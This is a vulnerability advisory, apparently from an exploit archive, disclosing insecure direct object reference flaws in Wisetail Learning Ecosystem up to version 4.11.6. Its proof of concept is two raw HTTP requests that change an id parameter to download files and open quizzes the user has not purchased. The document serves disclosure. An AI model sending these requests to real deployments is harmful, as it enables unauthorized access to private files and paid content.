Wisetail Learning Ecosystem 4.11.6 Insecure Direct Object Reference

2018.09.14

Credit: S. M. Zia Ur Rashid

Risk: High

Local: Yes

Remote: No

CVE: CVE-2018-16971 | CVE-2018-16970

CWE: N/A

Title: MULTIPLE IDOR VUNLERABILITies ON WISETAIL LEARNING ECOSYSTEM (LE)
UPTO V4.11.6

*D**ate:* 12/09/2019

*A**uthor:* S. M. Zia Ur Rashid

*Vendor Homepage:* wisetail.com

*Author Contact: *https://www.linkedin.com/in/ziaurrashid/

*Affected Version:* <= 4.11.6

*Assaigned CVE: *CVE-2018-16970, CVE-2018-16971

*Description:* Wisetail Learning Ecosystem (LE) upto v4.11.6 suffers from
multiple insecure direct object reference (IDOR) vulnerability that allows
to download files and access to the non-purchased course quiz test via a
modified id parameter.

*Proof-of-Concep (POC):*

  *// File Disclosure*

GET /eco_download.php?id=2639 HTTP/1.1

Host: xxxxxxx

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101
Firefox/63.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Cookie: xxxxxxxxxxxxxx

Upgrade-Insecure-Requests: 1

*// Access Quiz Test*

GET /eco_test.php?id=29 HTTP/1.1

Host: xxxxxxx

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:63.0) Gecko/20100101
Firefox/63.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Cookie: xxxxxxx

Upgrade-Insecure-Requests: 1

*Video POC:* https://youtu.be/l3msLYdI3fI

*References:*

https://blog.ziaurrashid.com/wisetail-learning-ecosystem-multiple-idor-vunlerability/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16970

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16971

*Regards,*
*S M Zia Ur Rashid*
Student, Dept. of EEE, International Islamic University Chittagong
Student Ambassador, IEEEmadC
Public Relation Ambassador, IEEEXtreme Programming Competition 12.0
Webmaster, IEEE Bangladesh Section Student Activities Committee 2018
Webmaster, IEEE IIUC Student Branch (2018)
Contact: E-mail <smziaurrashid@gmail.com> *|* Web <https://ziaurrashid.com/>

Connect: Facebook <https://www.facebook.com/smziaurrashid.info> *|* LinkedIn
<https://www.linkedin.com/in/ziaurrashid>

References:

https://blog.ziaurrashid.com/wisetail-learning-ecosystem-multiple-idor-vunlerability/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16970

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16971

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wisetail Learning Ecosystem 4.11.6 Insecure Direct Object Reference

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.